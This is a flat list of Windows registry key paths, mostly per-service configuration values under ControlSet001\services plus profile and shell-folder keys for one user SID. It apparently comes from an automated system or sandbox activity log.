HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ObjectName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64 